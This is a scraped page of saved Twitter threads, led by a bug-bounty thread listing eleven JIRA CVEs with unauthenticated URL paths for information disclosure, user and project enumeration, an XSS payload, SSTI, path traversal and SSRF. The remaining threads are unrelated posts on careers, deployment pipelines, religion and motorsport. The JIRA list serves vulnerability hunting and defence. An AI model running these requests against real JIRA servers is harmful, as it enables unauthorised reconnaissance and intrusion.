BC SOFTWARE

Saved by @CodyyyGardner

Harsh Bothra
@harshbothra_ 3 years, 6 months ago 944 views

Save to PDF Share See On Twitter

#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]

(6/n)
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.

(7/n)
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

(8/n)

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.

(n/n)
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
Blogs:
- https://t.co/ZMVc80vrYQ

More from Software

Jack Butcher
@jackbutcher

Building Principles:

↓

1/

Value = doing things that other people don't do, won't do or can't do.

"You get paid in direct proportion to the difficulty of problems you solve" — Elon Musk

2/

Service is high-touch result generation (building experience), product is low-touch result generation (scaling experience).

3/

In a world of infinite distraction, focus is the only path to freedom.

4/

Sell time to buy experience, sell experience to buy time.

“If you don't find a way to make money while you sleep, you will work until you die.” — Warren Buffett

$Kenneth Cassel \U0001f40d$

Kenneth Cassel 🐍...
@KennethCassel

Software engineering interview experiences don't have to be terrible.

Thread on my best software engineering interview experience.
👇🏼 (Thanks @PaulYacoubian for the idea)

Starting from the top of the funnel, I heard of this company (fintech startup, close to $1b valuation, based in NYC) from a podcast they were advertising on, and I liked the mission.

I went to their website and applied.

Their application portal used greenhouse. One page and no need for re-typing resume info.

They had an open field that said "Tell me something we should know about you".

I wrote about how I was a career switcher, had kids, went to school while working full time, etc.

Here's where they started to stand out.

They emailed me back a few days later and sent me a calendly link to schedule my first interview.

Letting the candidate choose a time for an interview is a small detail but is great for reducing candidate stress.

I scheduled my first interview. I received an email detailing what the interview would be about, what to expect, and what to prepare for. It would be a casual chat.

My interviewer mentioned and asked tons of questions about the free-response field I had filled out earlier.

Advertisement

Ron
@CodeMonkeyZ

Oct 1, 2020 - Fulton CTY
"Mr. Gilstrap stated that he did not feel comfortable installing a last-minute software change, and did not want Fulton County staff to be responsible for installing it. He told us that he told Dominion to conduct this

Yan Cui is making the ...
@theburningmonk

If you missed @clare_liguori's Continuous Delivery session this week (like I did) then good news, it's available on-demand now 🎊

https://t.co/78b8sI2hHs

And here's my play-by-play for the session

🧵...

This is a typical CD pipeline in AWS.

This is far more complex than the most complex CD pipeline I have ever had! Just cos it's complex, doesn't mean it's over-engineered though. Given the blast radius, I'm glad they do releases carefully and safely.

If you look closely, beyond all the alpha, beta, gamma environments, it's one-box in a region first then the rest of the region, I assume starting with the least risky regions first.

For anyone thinking about going multi-region (after the recent Kinesis outage), this is one of the complexities you need to consider. To do multi-region right and deploy safely (minimize blast radius), this is one of the complexities you have to factor in.

This "deploy small at first then more broadly" principle applies to #serverless apps too, though you can't "deploy to one box". You can do it with canary deployments instead, CodeDeploy supports this practice for Lambda (using weighted aliases) out-of-the-box.

$Opemipo Disu\U0001f680$

Opemipo Disu🚀
@coderoflagos

Are you a Designer or a Developer?👨‍💻

Here are some Google Chrome extensions that can make you better in 2021. 🔥🍀

(Thread) 🧵👇

1. https://t.co/zGir5E5U0J: https://t.co/PVx1wlX0Se is the easiest way to stay updated on the latest programming news. Get the hottest dev news from the best tech blogs on any topic you can think of.

2. CSS Peeper: CSS Peeper is a CSS viewer tailored for Designers. Get access to useful styles with our Chrome extension. Its mission is to let Designers focus on design, and spend as little time as possible digging in a

3. UX Check: UX Check makes heuristic evaluations quick and easy. The extension will open up Nielsen's Ten Heuristics in a side pane next to your website.

4. Checkbot: Checkbot finds critical SEO, speed & security problems before your website visitors do
Tests 100s of pages at once for broken links, duplicate titles, invalid HTML, insecure pages, and 50+ other

You May Also Like

AKASH
@AKASHBH95801446

THE SCIENCE BEHIND YAJNA

Fire is, of course, one of the greatest discovery of mankind. Our control over the fire dramatically changed the entire human habits; earlier it was used to cook food, protection from animals and to stay warm.

Among the many applications of fire, one is Yajna (यज्ञ, yajña); also called as Havana (हवन) or Agnihotra (अग्निहोत्र).
Yajna is elaborately described in Yajurveda. In Yajurveda, Yajna is the greatest among all works (Karman). One can purify his /her soul by performing Yajna.

In Vedic culture, it is thought that the holy fire is the mediator between Gods and us; when the offerings are made to Yajna with chanting mantras, it directly reaches the Gods, who bless the people with rains, food, health, and good luck.

According to Apastamba Sutra, the definition of Yajna is Vedic sacrifice; an act by which we surrender something for gods e.g. grains (Anna), pulse, milk and milk product (ghee, butter, curd) fruits, plant juice (soma), etc.

As we said; Yajna is the contact medium for gods and

to seek their blessings.

There are many types of Yajna performed by Hindus for e.g.,

1. Rajsuya Yajna
2. Ashwamedha Yajna
3. Chaaturmasya Yajna
4. Vaajpey Yajna
5. Purushmedha Yajna
6. Sarvamedha Yajna

Will Buxton
@wbuxtonofficial

The Haas / Force India argument is fascinating, and the decision of the stewards may still have consequences. The first key finding is that the stewards ruled Racing Point Force India to be a valid constructor. That means that it builds its own cars.

Haas had argued that the cars had been designed by Force India, but as Haas knows only too well, "outsourcing" is legal. The stewards decided that "there is no regulatory support for the argument that Outsourcing of Listed Parts cannot come from a former or excluded team."

In determining this, the stewards also came to the following conclusion: "In relation to the submission by the Racing Point Force India F1 Team that it is not a new team, the Stewards decide that the Racing Point Force India F1 Team is indeed a new team."

This will have a big knock on effect for Haas in its continued arguments over the rights of RPFI as relates to its eligibility and rights under the complex payments structure. Haas has argued all along that RPFI should be treated as a new team and tread the same path that it did.

TLDR? Haas lost the fight but may have won the war. In having its argument that Racing Point hadn't designed their own car thrown out, they gained clarification that RPFI was a new team.

Advertisement

Roger Grosse
@RogerGrosse

Important paper from Google on large batch optimization. They do impressively careful experiments measuring # iterations needed to achieve target validation error at various batch sizes. The main "surprise" is the lack of surprises. [thread]

https://t.co/7QIx5CFdfJ

The paper is a good example of lots of elements of good experimental design. They validate their metric by showing lots of variants give consistent results. They tune hyperparamters separately for each condition, check that optimum isn't at the endpoints, and measure sensitivity.

They have separate experiments where the hold fixed # iterations and # epochs, which (as they explain) measure very different things. They avoid confounds, such as batch norm's artificial dependence between batch size and regularization strength.

When the experiments are done carefully enough, the results are remarkably consistent between different datasets and architectures. Qualitatively, MNIST behaves just like ImageNet.

Importantly, they don't find any evidence for a "sharp/flat optima" effect whereby better optimization leads to worse final results. They have a good discussion of experimental artifacts/confounds in past papers where such effects were reported.

$Corey Haines \U0001f4a1$

Corey Haines 💡...
@coreyhainesco

I think I'm giving up on mainstream marketing content.

I'm giving up on social media consumption too.

So little substance.

Need to devote more time doing. More time creating.

Who needs another "5 ways to boost growth" post? I click and am disappointed every time. Not again.

I don't want to poop on content marketing, but marketers need to step it up.

Or at least, founders need to know that doing something is not always better than doing nothing.

Why is content marketing not as effective as it used to be? An innumerable amount of factors...

But one things for damn sure.

Things have to change.

Two of the chief sins:
1. Unoriginal research/story/study/etc
2. Not having anything more to add that's meaningful

Why blog/podcast/vlog/etc about something that's already been said? Already been done?

Do we really need another interview with founder of x hot startup? Do we really need another ultimate guide about facebook ads?

Not all content is like this...

Sometimes, you get an occasional piece that truly leaves you better off than you were before. That doesn't make you want to skim.

An original case study. A first time interview with a founder. An honest account of an experiment. An explanation of a change, shift, or realization.

Jaya_Upadhyaya
@Jayalko1

SRI KALAHASTI KSHETRAM, CHITTOOR (AP)
#bharatmandir

Panchbhootasthalam representing vayu element, also called Dakshin Kailasha.
As per Shiva’s boon, Vayu is incarnated here as Shiva and worshipped as Kalahasteeswara.
The kshetram is also associated with Rahu and Ketu.

The Kshetram is named after 3 devotees of Shiva- a snake, spider and elephant who worshipped a lingam in the forest. Elephant did jal abhishek with water from its trunk, spider protected it from dust by weaving a web on it and snake adorned it with his jewel.
@GunduHuDuGa

Once, the web and jewel got washed away when elephant sprayed water on the lingam. Angered snake entered elephant’s trunk and bit him but died in the process. The agitated elephant trampled the spider accidentally. Shiva gave moksha to all three.

Hence the name-Sri for Spider, kaal for snake n hasti for elephant.

Shiv bhakt Kanappa is said to have plucked his own eye to put it on the lingam here when he saw blood oozing from the eye on the lingam
This place is the ultimate location for Rahu Kethu Sarpa Dosha Nivarana.